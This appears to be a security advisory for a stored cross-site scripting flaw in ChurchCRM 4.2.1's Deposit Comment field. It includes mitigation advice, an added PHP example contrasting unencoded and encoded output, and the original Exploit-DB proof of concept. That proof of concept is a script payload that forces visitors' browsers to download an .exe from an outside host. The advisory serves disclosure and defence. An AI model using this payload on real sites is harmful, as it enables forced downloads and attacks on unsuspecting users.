Vendor: ChurchCRM
By: Mufaddal Masalawala
CVSS: 8.8 (HIGH)
Persistent Cross Site Scripting (XSS)
CWE: 79
Product Name: ChurchCRM
Affected Version From: 4.2.1
Affected Version To: 4.2.1
Patch Exists: No
Related CWE: N/A
CPE: a:churchcrm:churchcrm:4.2.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux 2020.3
2020

ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)

The ChurchCRM application allows stored XSS via the 'Add new Deposit' module; the stored payload is rendered when the 'View All Deposits' page is visited. An attacker can inject malicious JavaScript into the 'Deposit Comment' field, and when any user visits the 'View All Deposits' page the injected code executes in that user's browser.

Mitigation:

Validate user input and escape special characters before rendering the comment; implement a Content Security Policy (CSP); use a web application firewall.
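The defect class and its fix, as an added PHP example that is not ChurchCRM's own code: a stored deposit comment is echoed into a table cell unencoded (the vulnerable form), beside the same rendering with entity encoding at the point of output and a CSP header as a second layer. The `$deposit` row, the `dep_Comment` field name and the function names are assumptions for illustration.

```php
<?php
// Added example, not ChurchCRM's own code. Field names, the sample row and
// the function names are assumptions used to illustrate the fix.
declare(strict_types=1);

// Constructed sample row, as it might be read back from the deposits table
// after someone saved script text in the comment field.
$deposit = [
    'dep_ID'      => 42,
    'dep_Date'    => '2020-10-29',
    'dep_Comment' => "<script>alert(1)</script>",
];

// Vulnerable pattern: the stored string is interpolated straight into markup,
// so the browser parses the <script> element and runs it for every viewer
// of the page. This is the shape of bug the advisory describes.
function renderCommentVulnerable(string $comment): string
{
    return "<td>$comment</td>";
}

// Hardened pattern: entity-encode at the point of output. ENT_QUOTES also
// covers single quotes (attribute contexts); ENT_SUBSTITUTE keeps invalid
// UTF-8 from making htmlspecialchars() return an empty string, which would
// silently drop the comment instead of displaying it.
function renderCommentSafe(string $comment): string
{
    $encoded = htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<td>$encoded</td>";
}

// Input-side validation for a free-text field: reject oversized comments and
// control characters, but do not try to strip tags here; output encoding is
// what makes the stored value safe to display.
function isAcceptableComment(string $comment): bool
{
    if (mb_strlen($comment, 'UTF-8') > 255) {
        return false;
    }
    // C0 control characters and DEL (tab, LF and CR are allowed)
    return preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $comment) !== 1;
}

// Defence in depth: a CSP that forbids inline script, so an encoding gap that
// is missed elsewhere still cannot execute <script> injected into the page.
function cspHeaderValue(): string
{
    return "default-src 'self'; script-src 'self'; object-src 'none'; "
         . "base-uri 'self'; frame-ancestors 'self'";
}

// The header must be sent before any body output.
header('Content-Security-Policy: ' . cspHeaderValue());

echo renderCommentVulnerable($deposit['dep_Comment']), PHP_EOL;
echo renderCommentSafe($deposit['dep_Comment']), PHP_EOL;
echo isAcceptableComment($deposit['dep_Comment']) ? 'accepted' : 'rejected', PHP_EOL;
```

Run with `php example.php`: the first line prints the raw `<td><script>alert(1)</script></td>`, which a browser would execute; the second prints `<td>&lt;script&gt;alert(1)&lt;/script&gt;</td>`, which displays as text. The comment passes the length/control-character check, which is the point: validation alone does not prevent this bug, output encoding does. Before deploying a `script-src 'self'` policy to an existing application, its own inline scripts have to be moved to external files or given nonces, otherwise the policy blocks legitimate page functionality along with the injected script.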

Exploit-DB raw data:

#Exploit Title: ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)
#Date: 2020-10-29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
The ChurchCRM application allows stored XSS via the 'Add new Deposit' module; the payload is rendered when the 'View All Deposits' page is visited. There are multiple locations where this can be replicated. To exploit this vulnerability:

   1. Login to the application and go to the 'View all Deposits' module.
   2. Add the payload below in the 'Deposit Comment' field and click "Add New Deposit":

      <script>var link = document.createElement('a');
      link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
      link.download = ''; document.body.appendChild(link); link.click();
      </script>

   3. The payload is executed and a .exe file is downloaded.